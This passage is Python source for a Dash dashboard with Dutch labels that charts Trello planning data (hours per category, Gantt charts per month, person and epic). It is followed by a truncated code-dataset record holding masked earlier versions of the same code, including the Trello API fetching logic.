                                ]
                            ),
                            html.Div(
                                className='maindivs',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Ingeplande uren per categorie'),
                                    dcc.Dropdown(
                                        style = globals['styles']['dropdowns'],
                                        id='dropdownurenpermaand',
                                        options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Categories')] if name != None],
                                        multi=True,
                                        searchable=False,
                                        value = data['arrays'][config.get('Custom Field for Categories')]
                                    ),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            # Figure filled by the update_urenpermaand callback.
                                            dcc.Graph(id='urenpermaand')
                                        ]
                                    ),
                                ]
                            ),
                            html.Div(
                                className='tab1_div3',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Nog in te plannen uren (per lijst)'),
                                    dcc.Markdown('''*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'''),
                                    dcc.Markdown('''*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'''),
                                    dcc.Markdown('''*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'''),
                                    dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            dcc.Graph(
                                                id='graph_nietingepland',
                                                # Static figure built once in get_data.
                                                figure={'data': data['graphdata']['nietingepland'],
                                                        'layout': globals['graphlayouts']['bars']}
                                            )
                                        ]
                                    ),
                                ]
                            ),
                            html.Div(
                                className='tab1_div4',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Nog in te plannen uren (per epic)'),
                                    dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            dcc.Graph(
                                                id='graph_nietingepland_epics',
                                                figure={'data': data['graphdata']['nietingeplandepics'],
                                                        'layout': globals['graphlayouts']['bars']}
                                            )
                                        ]
                                    ),
                                ]
                            ),
                        ]
                    ),
                    # --- Tab 4: tactical (mid-term) planning ---
                    dcc.Tab(
                        style=globals['styles']['tabs'],
                        label='Tactische planning',
                        children=[
                            html.Div(
                                className='maindivs',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H3('Uitleg'),
                                    dcc.Markdown('''In dit tabblad is een middellange termijnplanning te zien.'''),
                                ]
                            ),
                            html.Div(
                                className='maindivs',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Totalen'),
                                    dcc.Markdown('''Hieronder staan twee totaaloverzichten van de aankomende maanden.'''),
                                    dcc.Markdown('''De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'''),
                                    dcc.Markdown('''Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'''),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            dcc.Graph(
                                                figure=(data['graphdata']['gaugefig'])
                                            )
                                        ]
                                    )
                                ]
                            ),
                            html.Div(
                                className='maindivs',
                                style=globals['styles']['maindivs'],
                                children=[
                                    html.H4('Gantt'),
                                    dcc.Dropdown(
                                        style = globals['styles']['dropdowns'],
                                        id='dropdowngantttactisch',
                                        # threemonths holds (value, label) pairs — note the reversed order here.
                                        options=[{'label':j, 'value': i} for i,j in data['arrays']['threemonths']],
                                        multi=False,
                                        searchable=False,
                                        value = data['arrays']['threemonths'][0][0],
                                    ),
                                    html.Div(
                                        style=globals['styles']['divgraphs'],
                                        children=[
                                            dcc.Graph(id='gantttactisch'
                                            )
                                        ]
                                    )
                                ]
                            ),
                        ]
                    ),
                    # dcc.Tab(
                    #     style=globals['styles']['tabs'],
                    #     label='Configuratie',
                    #     children=[
                    #         html.Div(
                    #             className='maindivs',
                    #             style=globals['styles']['maindivs'],
                    #             children=[
                    #                 html.H3('Uitleg'),
                    #                 dcc.Markdown('''Klik op de button hieronder om de huidige configuratie te downloaden.'''),
                    #                 html.A(id='export_link', href='/dash/configuration/', children=[html.Button(id='export_button', type='button', children=['Export'])]),
                    #                 dcc.Markdown('''Pas het bestand aan en upload deze hieronder.'''),
                    #                 dcc.Upload(
                    #                     id='configupload',
                    #                     children=html.Div([
                    #                         'Sleep het bestand of ',
                    #                         html.A('selecteer het bestand')
                    #                     ]),
                    #                     style=globals['styles']['divgraphs'],
                    #                     multiple=False,
                    #                 ),
                    #                 html.Div(id='confirmupload',style=globals['styles']['divgraphs'])
                    #             ]
                    #         ),
                    #     ]
                    # )
                ]
            )
        ]
    )
#---! gantttactisch
def _shift_month(yyyymm, delta):
    """Return the 'YYYYMM' period *delta* months away from *yyyymm*.

    Handles year roll-over in both directions (e.g. '202012' + 2 -> '202102').
    """
    year, month = int(yyyymm[:4]), int(yyyymm[4:])
    month += delta
    year += (month - 1) // 12
    month = (month - 1) % 12 + 1
    return '%04d%02d' % (year, month)

@app.callback(Output('gantttactisch', 'figure'),
             [Input('dropdowngantttactisch','value')]
)
def update_gantttactisch(v1):
    """Gantt chart of all active cards that overlap the selected month *v1*.

    The visible window runs from the first day of the previous month up to the
    first day of the month after next; card begin/end dates are clamped to it.
    Two vertical black lines mark the start and end of the selected month.
    Returns an empty transparent figure when no month is selected.
    """
    if v1 is None:
        return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
    import numpy as np
    from operator import itemgetter
    # Neighbouring periods. BUGFIX: the original inline arithmetic only
    # special-cased month '11' for the +2 step, so selecting December produced
    # an invalid period like '202014'; strptime then raised inside the bare
    # except below and every card was silently dropped from the chart.
    v1min1 = _shift_month(v1, -1)
    v1plus1 = _shift_month(v1, 1)
    v1plus2 = _shift_month(v1, 2)
    window_start = datetime.strptime(v1min1 + '01', '%Y%m%d').date()
    window_end = datetime.strptime(v1plus2 + '01', '%Y%m%d').date()
    monthkey = int(v1)
    ganttdata = []
    for _, kaart in data['kaarten'].items():
        if kaart['Status'] not in ['Niet gestart', 'Doing', 'Blocked']:
            continue
        try:
            if int(datetime.strftime(kaart['Begindatum'], '%Y%m')) <= monthkey and int(datetime.strftime(kaart['Einddatum'], '%Y%m')) >= monthkey:
                # Clamp the bar to the visible three-month window.
                start = max(kaart['Begindatum'].date(), window_start)
                eind = kaart['Einddatum'].date()
                if eind >= window_end:
                    eind = window_end
                ganttdata.append(dict(Task=kaart['Epic'],
                                      Start=start,
                                      Finish=eind,
                                      Resource=kaart['Naam'] + ' (uren: ' + str(round(data['urenperdagperkaart'][kaart['Naam']]['urenperperiode'][v1])) + ')'
                                      ))
        except Exception:
            # Cards without valid begin/end dates or without planned hours
            # for this period cannot be drawn and are skipped.
            pass
    result = sorted(ganttdata, key=itemgetter('Task'))
    # One random colour per bar (the unused 'import random' was removed;
    # colours come from np.random).
    rgb = ['rgb(' + ','.join(map(str, np.random.choice(range(256), size=3))) + ')' for _ in result]
    fig = ff.create_gantt(result, index_col='Resource', show_colorbar=True, group_tasks=False, showgrid_x=True, showgrid_y=True, colors=rgb)
    fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
                        plot_bgcolor='rgba(0,0,0,0)',)
    # Vertical markers on the first day of the selected and of the next month.
    for grens in (v1, v1plus1):
        eerste_dag = grens[0:4] + '-' + grens[4:] + '-01'
        fig.add_trace(go.Scatter(mode='lines', x=[eerste_dag, eerste_dag], y=[-1, len(result)], line={'shape': 'spline', 'color': 'black', 'width': 4}, showlegend=False))
    return fig
# #---! configupload
# @app.callback(Output('confirmupload', 'children'),
# [Input('configupload','contents')]
# )
# def confirm_upload(contents):
# global newconfig
# if contents is not None:
# try:
# newconfig = json.loads(base64.b64decode(contents[23:]).decode('ASCII'))
# d = {}
# for key,value in newconfig.items():
# if type(value) == list:
# d[key] = ''
# for i in value:
# if d[key] == '':
# d[key] += i
# else:
# if i == value[-1]:
# d[key] += (', '+i)
# else:
# d[key] = value
# return html.Div(
# id='returneddiv',
# style=globals['styles']['divgraphs'],
# children=[
# dcc.Markdown('''Check hieronder of de juiste data is ingevoerd. Klik daarna daaronder op 'Opslaan'.'''),
# dash_table.DataTable(
# style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},
# style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'},
# columns=[{'name': 'Sleutel', 'id': 'Sleutel'}, {'name': 'Waarde', 'id': 'Waarde'}],
# data=[{'Sleutel': key, 'Waarde': value} for key, value in d.items()]
# ),
# html.Button(
# 'Opslaan',
# id='save_button',
# n_clicks=0
# ),
# html.Div(
# id='savedornot',
# )
# ]
# )
# except:
# return html.H5('Het bestand is incorrect. Download en upload opnieuw!')
# else:
# return
# #---! save-button
# @app.callback(Output('savedornot','children'),
# [Input('save_button','n_clicks'),])
# def save_fnct(n_clicks):
# if n_clicks > 0:
# with open('./configuration/configuration.txt','w') as outfile:
# json.dump(newconfig, outfile, indent=4, sort_keys=True)
# return 'Opgeslagen. Refresh de page.'
# else:
# return
#---! ganttpersoon
@app.callback(Output('ganttpersoon','figure'),
             [Input('dropdownganttpersoon','value'),
             Input('dropdownganttpersoonstatus', 'value')])
def update_ganttpersoon(v1, v2):
    """Gantt chart of all non-archived cards assigned to person *v1* whose
    status is in the multi-select *v2*, coloured per epic.

    Returns an empty transparent figure when no card matches.
    """
    ganttdata = []
    for i, j in data['kaarten'].items():
        if j[config.get('Custom Field for Person')] == v1 and j['Status'] != 'Archived' and j['Status'] in v2:
            try:
                ganttdata.append(dict(Task=j['Naam'],
                                    Start=j[config.get('Custom Field for Starting date')].date(),
                                    Finish = j[config.get('Custom Field for Ending date')].date(),
                                    Resource=j['Epic']
                                    ))
            # BUGFIX: was a bare 'except:', which also swallows SystemExit and
            # KeyboardInterrupt. Only missing/None dates are expected here.
            except (AttributeError, KeyError, TypeError):
                pass
    if ganttdata != []:
        fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)
        fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
                            plot_bgcolor='rgba(0,0,0,0)',)
        return fig
    else:
        return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
#---! ganttepics
@app.callback(Output('ganttepics','figure'),
             [Input('dropdownganttepics','value')])
def update_ganttepics(value):
    """Gantt chart of all non-archived cards in epic *value*, coloured by status.

    Returns an empty transparent figure when no card matches.
    """
    ganttdata = []
    for i, j in data['kaarten'].items():
        if j['Epic'] == value and j['Status'] != 'Archived':
            try:
                ganttdata.append(dict(Task=j['Naam'],
                                    Start=j[config.get('Custom Field for Starting date')].date(),
                                    Finish = j[config.get('Custom Field for Ending date')].date(),
                                    Resource=j['Status']
                                    ))
            # BUGFIX: was a bare 'except:', which also swallows SystemExit and
            # KeyboardInterrupt. Only missing/None dates are expected here.
            except (AttributeError, KeyError, TypeError):
                pass
    if ganttdata != []:
        fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)
        fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)',
                            plot_bgcolor='rgba(0,0,0,0)',)
        return fig
    else:
        return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
#---! urenpermaand callback
@app.callback(Output('urenpermaand', 'figure'),
             [Input('dropdownurenpermaand', 'value')]
)
def update_urenpermaand(value):
    """Stacked area chart of planned hours per month for the selected
    categories (*value*), plus a thick black line with the total available
    hours per month.

    The original body duplicated the trace construction three times and
    shadowed the *value* parameter inside its comprehensions; both are fixed
    here with small local helpers. Output is unchanged.
    """
    layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)',
                      plot_bgcolor='rgba(0,0,0,0)',
                      xaxis={'title': 'Datum', 'gridcolor': 'gray'},
                      yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})

    def hours_per_period(categorie):
        # Planned hours summed over all cards of *categorie*, one entry per period.
        return [round(sum(kaart['urenperperiode'][periode]
                          for kaart in data['urenperdagperkaart'].values()
                          if kaart[config.get('Custom Field for Categories')] == categorie), 0)
                for periode in data['arrays']['perioden']]

    def stacked_trace(categorie, naam):
        # One band of the stacked area chart.
        return dict(x=data['arrays']['xaxis_months'],
                    y=hours_per_period(categorie),
                    name=naam,
                    line = {'shape': 'spline', 'smoothing': 0.4},
                    mode='lines+markers',
                    marker= {'symbol': 'triangle-up-open', 'size': 10},
                    stackgroup='one',
                    )

    bars = []
    # 'Regulier werk' is always drawn first so it forms the bottom band.
    if 'Regulier werk' in value:
        bars.append(stacked_trace('Regulier werk', 'Regulier werk'))
    for categorie in data['arrays'][config.get('Custom Field for Categories')]:
        if categorie in value and categorie != 'Regulier werk':
            bars.append(stacked_trace(categorie, 'Geen categorie' if categorie is None else categorie))
    # Total available hours as a thick black reference line (not stacked).
    beschikbaar = [round(sum(persoon['urenperperiode'][periode]
                             for persoon in data['beschikbareuren'].values()), 0)
                   for periode in data['arrays']['perioden']]
    bars.append(dict(name='Totaal beschikbare uren',
                    mode = 'lines',
                    x = data['arrays']['xaxis_months'],
                    y = beschikbaar,
                    size=10,
                    line = {'shape': 'spline', 'smoothing': 0.3, 'width':6, 'color': 'black'},
                    ))
    return {
        'data': bars,
        'layout': layout}
#--! App routes
@app.server.route("/dash/configuration/")
def download_file():
    """Serve the current board configuration file as a download."""
    config_path = './configuration/configuration.txt'
    # cache_timeout=0 so the browser always fetches the latest configuration.
    return flask.send_file(
        config_path,
        attachment_filename="configuration.txt",
        as_attachment=True,
        cache_timeout=0,
    )
#--! Check if this is the main app and if so, run Dash!
# Binds to all interfaces (0.0.0.0) on port 8050 with debug disabled; in
# production this module is typically served via a WSGI server instead.
if __name__ == '__main__':
    app.run_server(debug=False,host='0.0.0.0', port=8050)
|
flexible
|
{
"blob_id": "c5f41b69ac215bd661ee39bdc8c3119db9606ca8",
"index": 6020,
"step-1": "<mask token>\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n<mask token>\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_data(value):\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(\n 'API token')\n trello_base_url = 'https://api.trello.com/1/'\n board_url = trello_base_url + 'boards/' + value\n url_cards = (board_url +\n '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'\n + keys)\n url_lists = board_url + '/lists?filter=all&' + keys\n url_customfields = board_url + '/customFields?' + keys\n url_labels = board_url + '/labels?' + keys\n url_members = board_url + '/members?' + keys\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json())\n )\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},\n 'checkbox': {}}\n for i in customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j[\n 'value'].get('text')\n else:\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n 
chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n\n def idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex, 16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate\n\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=') + 7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i\n ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':\n idtodate(i['id']), 'labels': [label['name'] for label in i['labels'\n ] if i['labels'] != []], 'members': [member['fullName'] for member in\n members if member['id'] in i['idMembers']], 'Sjabloon': i[\n 'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i\n ['closed'], 'epicid': [get_epicid(j['url']) for j in i[\n 'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in\n cards}\n for i, j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', ' + k\n else:\n j['Leden'] = None\n del j['members']\n if customfields_dict != {}:\n for i, j in customfields_dict.items():\n for k, l in j.items():\n for m, n in kaarten.items():\n n[l['name']] = None\n for i, j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')\n ] = customfields_dict['list'][k['idCustomField']][\n 'options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys(\n ):\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = True\n else:\n 
j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')\n ] = dateCalc(k['value'].get('date'))\n else:\n for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get(\n 'name')] = k['value'].get(key)\n epicIdNameCategory = []\n for i, j in kaarten.items():\n epicIdNameCategory.append((i, j['Naam'], j[config.get(\n 'Custom Field for Categories')]))\n for i, j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n for i, j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']:\n j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i, j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n cardstodelete = []\n for i, j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n hours = {}\n for i, j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j\n 
[config['Custom Field for Starting date']], config[\n 'Custom Field for Ending date']: j[config[\n 'Custom Field for Ending date']], config[\n 'Custom Field with hours']: j[config[\n 'Custom Field with hours']]}\n for i in cardstodelete:\n if i in kaarten:\n del kaarten[i]\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n for x in range(0, numdays):\n tmpdatesdict[str(now + timedelta(days=x))] = {}\n for x in range(0, numdayshistory):\n tmpdatesdict[str(now - timedelta(days=x))] = {}\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i)\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten\n .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i\n [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(\n i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(\n [card['Status'] for card in kaarten.values()])), config.get(\n 'Custom Field for Categories'): list(dict.fromkeys([card[config.get\n ('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([(card[\n config.get('Custom Field for Person')] if card[config.get(\n 'Custom Field for Person')] != None else 'Geen ' + config.get(\n 'Custom Field for Person')) for card in kaarten.values()]))}\n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],\n config.get('Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): 
kaart[config.get(\n 'Custom Field with hours')], 'Cognosrapport': kaart[\n 'Cognosrapport'], 'Niet meenemen in telling': kaart[\n 'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], config.get(\n 'Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in\n hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i, '%Y-%m-%d').date()\n for k, l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get(\n 'Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')\n ] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get(\n 'Custom Field with hours')]) / int(delta.days)\n urenperdagperkaart[l['Naam']]['urenperdag'][i\n ] = hoursperday\n except:\n pass\n for k, l in hours.items():\n try:\n if l[config.get('Custom Field for Starting 
date')].date(\n ) < datekey <= l[config.get('Custom Field for Ending date')\n ].date():\n hoursperday = int(l[config.get('Custom Field with hours')]\n ) / int(30.4)\n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n for i, j in urenperdagperkaart.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n for i, j in beschikbareuren.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n dfurenpermaand = copy.deepcopy(urenperdagperkaart)\n for i, j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k, l in j['urenperperiode'].items():\n j[k] = round(l, 2)\n del j['urenperperiode']\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],\n type='bar', opacity='0.6'))\n epicbars = []\n tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in\n kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting 
date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get(\n 'Custom Field with hours')])\n epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[\n value for value in epicsforbarchart.values()], type='bar', text=[\n value for value in epicsforbarchart.values()], textposition=\n 'outside', opacity='0.6'))\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,\n '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,\n '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,\n '%Y%m').strftime('%B'))]\n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n twomonths]))\n deltathismonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == nextmonth]))\n deltatwomonths = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == twomonths]))\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth 
